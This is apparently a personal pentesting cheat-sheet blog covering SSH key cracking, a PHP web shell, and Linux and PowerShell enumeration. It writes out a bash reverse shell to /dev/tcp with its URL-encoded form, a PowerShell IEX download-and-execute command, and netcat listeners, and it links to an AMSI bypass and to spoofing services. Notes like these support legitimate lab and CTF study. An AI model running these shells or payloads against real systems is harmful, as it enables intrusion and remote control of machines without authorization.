Categorie: Uncategorized

Categorieën
Steno Uncategorized

Steno

Look at picture for content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png
Categorieën
SSH Uncategorized

SSH

Use SSH private key

.priv

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test

Categorieën
Sites Uncategorized

Interesting Sites

Container and Vulnerable app

https://github.com/bleubyte/nostromo_nhttpd

https://github.com/MSFT-Security-EMEA/Def4Cloud-Log4J-Demo-Example

Recon / Enumeration

http://www.lifeoverpentest.com/ https://backdoorshell.gitbooks.io/oscp-useful-links/ https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/ https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.thegeekstuff.com/2010/07/execute-shell-script/ https://hashes.org/ https://github.com/blackploit/hash-identifier.git

https://ired.team/offensive-security-experiments/offensive-security-cheetsheets

https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/

https://github.com/rasta-mouse?tab=repositories

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

https://iwantmore.pizza/posts/amsi.html

https://github.com/d0nkeys/redteam/tree/master/code-execution

https://github.com/d0nkeys/redteam

Working AMSI Bypass

https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1

Exploits

https://nvd.nist.gov/vuln/search https://www.exploit-db.com/ https://packetstormsecurity.com/ https://www.securityfocus.com/vulnerabilities https://0day.tday http://mvfjfugdwgc5uwho.onion/

Social engineering

https://www.spoofmytextmessage.com/ https://www.spoofmyemail.com/

https://goo.gl tinyurl.com

Categorieën
python Uncategorized

Python

SimpleHTTPServer

  • python -m SimpleHTTPServer 4343 (default 8000)

SHELL

  • python -c ‘import pty;pty.spawn(“/bin/bash”)’
  • stty raw -echo //now push enter enter once type fg enter enter twise

*check rows & colums stty -a stty rows 34 cols 136

export TERM=xterm

Categorieën
Powershell tips Uncategorized

Powershell

Encode BASE64

  • cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
  • nc -lvnp 9001 (listener)
  • $username = ‘username’
  • $password = ‘password’
  • $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  • $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  • enter-pssession -computername x.x.x.x -Port 5985 -credential $credential

*powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/exploit.html‘)”

Categorieën
Port Knocking Uncategorized

Port Knocking

Check for port knock services

  • /etc/init.d$ ls
  • less knockd

Check config file

  • etc/default/knowckd

Run tcp packet on required ports

*for i in 571 290 911; do nmap -Pn -p $i –host-timeout 201 –max-retries 0 x.x.x.x; done

Categorieën
PHP Uncategorized

PHP

PHP

Upload php code exec script

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

in url go to shell.php?command=whoami

In Burpsuite create post request

POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′

URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’

Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444

Categorieën
Nessus Uncategorized

Nessus

/etc/init.d/nessusd start https://127.0.0.1:8834

Categorieën
Magic Bytes Change Uncategorized

Change Magic Bytes of files

*python -c ‘print “\x47\x49\x46\x38\x37\x61″‘ > test.txt *https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/

Categorieën
Linux Checks Uncategorized

Linux Checks

Hostname

hostname

Kernel Version

uname -a

Operating System

Related command cat /etc/issue

Running processes

ps auxw

Running services

netstat -antp

Lookup folders

  • ls /

Look SUID files

  • find / -perm -4000 2>/dev/null

tmux migration

  • Running ps aux reveals a tmux session being run as the root user.
  • Simply running the command tmux -S /.devs/dev_sess will connect to the session, with full root privileges.

 

GREP password in files

*grep -Ri password | less

 

Linux process monitor

#!/bin/bash

#loop by line IFS=$'\n'

old_process=$(ps -eo command)

while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") sleep 1 old_process=$new_process done

 

Check for GTFOBins

  • run sudo -l to check which commands you can execute under sudo rights
  • check https://gtfobins.github.io/ for commands to escalate to root

Check linux read to read/write options

 

*check you have read permissions on files ls -la *check to of location you do have write permissions *mkdir writelocation *cp -r /target/folder /writelocation